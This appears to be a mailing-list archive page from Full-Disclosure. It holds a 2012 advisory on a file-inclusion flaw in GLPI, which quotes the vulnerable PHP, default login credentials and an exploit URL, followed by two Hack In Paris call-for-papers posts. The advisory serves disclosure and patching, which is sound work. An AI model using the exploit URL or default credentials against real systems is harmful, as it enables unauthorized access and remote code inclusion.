[Full-disclosure] CVE-2012-1037: GLPI = 0.80.61 LFI/RFI
CVE-2012-1037: GLPI = 0.80.61 LFI/RFI
Severity: Important
Vendor: GLPI - http://www.glpi-project.org
Versions Affected
=
All versions between 0.78 and 0.80.61
Description
===
GLPI fails to properly sanitize the GET 'sub_type' parameter in the
front/popup.php file:
[...]
checkLoginUser();
if (isset($_GET[popup])) {
$_SESSION[glpipopup][name] = $_GET[popup];
}
if (isset($_SESSION[glpipopup][name])) {
switch ($_SESSION[glpipopup][name]) {
[...]
case add_ruleparameter :
popHeader($LANG['ldap'][35], $_SERVER['PHP_SELF']);
include strtolower($_GET['sub_type'].Parameter.php); // ===
break;
[...]
To be triggered, the attacker needs to be authenticated. However, GLPI provides
default accounts that often aren't changed or disabled:
glpi/glpi
tech/tech
normal/normal
post-only/postonly
Impact
==
Since there is a suffix, the vulnerability can be used as a RFI (requires
allow_url_include = On).
For LFI, the target file has to end up with parameter.php. GLPI automatically
escapes all GET and POST parameters with addslashes(), so the null byte
technique is not usable. I have not tested exploitation using path truncation
technique but it might be possible.
Mitigation
==
Upgrade to GLPI 0.80.7.
Exploit
===
http://server/front/popup.php?popup=add_ruleparametersub_type=file
Timeline
08 feb 2012 - Found the bug.
09 feb 2012 - Contacted the GLPI Team.
09 feb 2012 - Bug fixed new version available.
Thanks to the GLPI team for being responsive!
References
==
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037
https://forge.indepnet.net/projects/glpi/versions/685
https://forge.indepnet.net/projects/glpi/repository/revisions/17457/diff/branches/0.80-bugfixes/front/popup.php
--
Emilien Girault
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hack In Paris 2011 Call For Papers Reminder
Hello FD! This is just a reminder that the Call for Papers for Hack In Paris 2011 is closing on 30th of March. We've received some very nice submissions so far. Hack In Paris will take place in Disneyland Paris Conference Center and will be split into two parts: * June 14-15: Trainings * June 16-17: Talks Please do not hesitate to submit! Your submission should contain the following elements: * The biography of each author * A short description (abstract) of your presentation * The summary of your research, including technical information; in particular novel research with regards to the state of the art * An estimation of your expenses (trip and hotel) Please send your proposal to cfp[at]hackinparis[dot]com. Contact Social Media == Contact:info[at]hackinparis[dot]com Website:http://www.hackinparis.com/ Twitter:http://twitter.com/hackinparis Facebook: http://www.facebook.com/pages/Hack-In-Paris/134611446603792 Linkedin: http://www.linkedin.com/groups?gid=3750882 -- the HIP team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hack In Paris 2011 Call For Papers
Hack In Paris 2011 http://www.hackinparis.com/ Call For Papers Introduction Since 2004, Sysdream and HZV have organized the Nuit du Hack (Hacker's Night) event in Paris, France. After the success of last year with more than 600 attendees, we are planning a more international and corporate event. Aiming to bring together security professionals and enthusiasts, Hack In Paris will focus on the latest advances in IT security. The conference will be held at Disney's Conference Centre in Disneyland Paris from June 16th to 17th of 2011. This place is easily accessible by train (15mn ride) from downtown Paris and airports. Topics == The following list contains major topics the conference will cover. Please consider submitting even if the subject of your research is not listed here. * Advances in reverse engineering * Vulnerability research and exploitation * Penetration testing and security assessment * Malware analysis and new trends in malicious codes * Forensics, IT crime law enforcement * Privacy issues: LOPPSI, HADOPI, ... * Low-level hacking (console security mobile devices) * Risk management and ISO 27001 How to submit? == Submissions should contain the following elements: * The biography of each author * A short description (abstract) of your presentation * The summary of your research, including technical information; in particular novel research with regards to the state of the art * An estimation of your expenses (trip and hotel) Plase send your proposal to cfp[at]hackinparis[dot]com. Note: presentations will take about 45 minutes, including 5 to 10 minutes of questions. All submissions will be reviewed by our program committee. Authors will be notified upon acceptance of their talk. Upcoming dates == January 20 CFP announced April 31Submission deadline May 15 Notification sent to authors May 17 Program announcement June 16-17 Hack In Paris June 18 Nuit du Hack Trainings = We are also looking for experienced professionals to give one or two-day trainings. Contact trainings[at]hackinparis[dot]com. Contact Social Media == Contact:info[at]hackinparis[dot]com Twitter:http://twitter.com/hackinparis Facebook: http://www.facebook.com/pages/Hack-In-Paris/134611446603792 Linkedin: http://www.linkedin.com/groups?gid=3750882 Thank you very much, and we hope to see you soon in Paris! -- the HIP team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
